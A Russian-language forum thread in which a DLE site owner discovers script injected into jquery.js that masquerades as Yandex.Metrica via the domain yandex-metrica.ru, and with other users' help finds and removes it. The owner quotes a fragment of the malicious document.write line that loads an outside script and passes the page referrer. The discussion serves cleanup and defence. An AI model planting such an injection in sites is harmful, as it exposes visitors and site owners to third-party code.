Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Вирус или нет? yandex-metrica.ru

Тема в разделе "Вопросы- ответы", создана пользователем welop, 16 фев 2018.

16.02.18 в 11:48
welop
06.11.18 в 10:05
byroot
13
1.497
0
Ответить в теме
  1. TopicStarter Overlay
    welop

    welop
    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    37
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    Добрый день! Проблема в следующем: заметил, что сайт в последнее время стал долго загружаться. Решил проверить сайт на webpagetest.org.
    В итоге нашел непонятный код/скрипт (хз что это), который тормозит загрузку сайта. В этом коде указывается домен yandex-metrica.ru , который никак не относится к яндекс.метрике, т.е. маскируется под счетчик. В html коде сайта данного домена нет.

    Скрины проверки:
    749.jpg 750.jpg 751.jpg 752.jpg

    Адрес сайта заменил на site.ru, чтобы было видно в какой форме указывается домен: siteru или site.ru/page.html (любая страница сайта, которая проверяется)

    Вопрос: что это такое и как это удалить?

    p.s проверил сайт еще тут https://rescan.pro
    753.jpg
    адрес одной из ссылок такой :
    754.jpg
     
    #1 welop, 16 фев 2018
    Последнее редактирование: 16 фев 2018
  2. byroot

    byroot
    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.295
    Лучших ответов:
    54
    Рейтинги:
    +5.206 / 74 / -0
    чтобы сказать что-то дельное - нужно увидеть сам сайт воочию и посмотреть все его запросы которые он делает при загрузке...
     
    #2 byroot, 16 фев 2018
  3. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    Я бы искал так в firefox: F12 > Сеть > смотрю и тыкаю нужный запрос > стек-трейс
    Что мне это дало бы? узнал откуда в коде вызывается этот запрос ну, а дальше сам решай что да как
     
    #3 volodec, 16 фев 2018
    • Нравится Нравится x 1
  4. TopicStarter Overlay
    welop

    welop
    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    37
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    сделал
    скрипт вызывается в файле /engine/classes/min/index.php . Как я понял этот файл отвечает за сжатие js. В админ панели сжатие включено.

    В head прописано так <script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;17"></script>
    Открываю данную страницу. Нахожу данный домен yandex-metrica.ru в коде:

    document.write('<script type="text/javascript" src="Google*SITERU*?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>');var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=["Top","Right","Bottom","Left"],U=function(a,b){retu.....

    Вместо *SITERU* - адрес сайта

    Но как его удалить, если данный код генерируется автоматически?
     
    #4 welop, 16 фев 2018
  5. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    х.з. где это находится, но я бы искал через Notepad++ : ctrl+f > найти в файлах > в поле "найти" впиши дырявую ссылку > "заменить на" оставь пустым > "фильтр" *.* > "папка" :директория проекта целиком(для пущей надежности) > ждать
     
    #5 volodec, 16 фев 2018
  6. TopicStarter Overlay
    welop

    welop
    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    37
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    все, код нашел! как его удалить правильно, чтобы не нарушить файл? В php не силен(
    js3.JPG
    Выделил начало кода, где его конец - хз)

    UPD.
    Часть кода такая:

    }});document.write('<script type="text/javascript" src="Google*SITERU*?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>');var
    S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source

    Удалять то, что внутри ('...')? или начиная от document.write (и до куда)?
     
    #6 welop, 16 фев 2018
    Последнее редактирование: 16 фев 2018
  7. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    и до первой точки с запятой( ; ) включительно. А что за файл, может он целиком не нужен?
     
    #7 volodec, 16 фев 2018
  8. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    хотя лучше сюда эту стоку дай посмотреть (до ; )
     
    #8 volodec, 16 фев 2018
  9. TopicStarter Overlay
    welop

    welop
    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    37
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    файл /engine/classes/js/jquery.js

    удалил, при редактировании файла этот код не находит, но когда открываешь файл в браузере - по-прежнему он есть.
     
    #9 welop, 16 фев 2018
  10. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    А файл на сервер залил и кеш очистил?
     
    #10 volodec, 16 фев 2018
    • Нравится Нравится x 1
  11. TopicStarter Overlay
    welop

    welop
    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    37
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    Все, удалил код.
    Кэш на cloudflare пришлось чистить. Спасибо огромнейшее за помощь!!!
     
    #11 welop, 16 фев 2018
  12. byroot

    byroot
    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.295
    Лучших ответов:
    54
    Рейтинги:
    +5.206 / 74 / -0
    нужно ставить все актуальные баг-фиксы для ДЛЕ, чтобы максимально минимизировать подобные случаи.
     
    #12 byroot, 17 фев 2018
  13. valerchik

    valerchik Посетитель

    Регистрация:
    2 июн 2016
    Сообщения:
    69
    Лучших ответов:
    1
    Рейтинги:
    +13 / 0 / -0
    Установленные багфиксы не смогли противостоять внедрению этого вируса.
    Да, и указанный выше файл не редактировался с момента установки движка.
     
    #13 valerchik, 5 ноя 2018
  14. byroot

    byroot
    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.295
    Лучших ответов:
    54
    Рейтинги:
    +5.206 / 74 / -0
    Тема эта была когда ещё не было даже ДЛЕ 13 и 13.1! Используйте актуальные версии ДЛЕ по возможности, если нет - защищайте админку от брута админа, как защищать админку - уже много раз обсуждалось!
     
    #14 byroot, 6 ноя 2018
(Вы должны войти или зарегистрироваться, чтобы разместить сообщение.)
Похожие темы
  1. PunPun

    Yandex ms для dle 9.x - 11.x

    PunPun, 16 июн 2015, в разделе: Прочее
    Ответов:
    21
    Просмотров:
    3.288
    PunPun
    5 май 2016
  2. mrmalik

    Окно с обновлением на андроид. вирус?

    mrmalik, 27 янв 2017, в разделе: Свободное общение
    Ответов:
    9
    Просмотров:
    1.228
    kinohard
    30 янв 2017
  3. Dezorientare

    SEO Новости Компьютерный вирус wannacry: следы ведут в поднебесную…

    Dezorientare, 30 май 2017, в разделе: SEO новости
    Ответов:
    0
    Просмотров:
    488
    Dezorientare
    30 май 2017
  4. grandmaster89

    Украину атаковал вирус petya.a.

    grandmaster89, 27 июн 2017, в разделе: Свободное общение
    Ответов:
    17
    Просмотров:
    1.235
    grandmaster89
    27 июн 2017
  5. Dezorientare

    SEO Новости Очередной вирус-вымогатель атаковал компьютеры в украине и россии

    Dezorientare, 28 июн 2017, в разделе: SEO новости
    Ответов:
    11
    Просмотров:
    750
    Romantv
    29 июн 2017
Загрузка...
Переключить ширину
Стиль
Zerocool-New
Язык
Russian (RU)
Яндекс.Метрика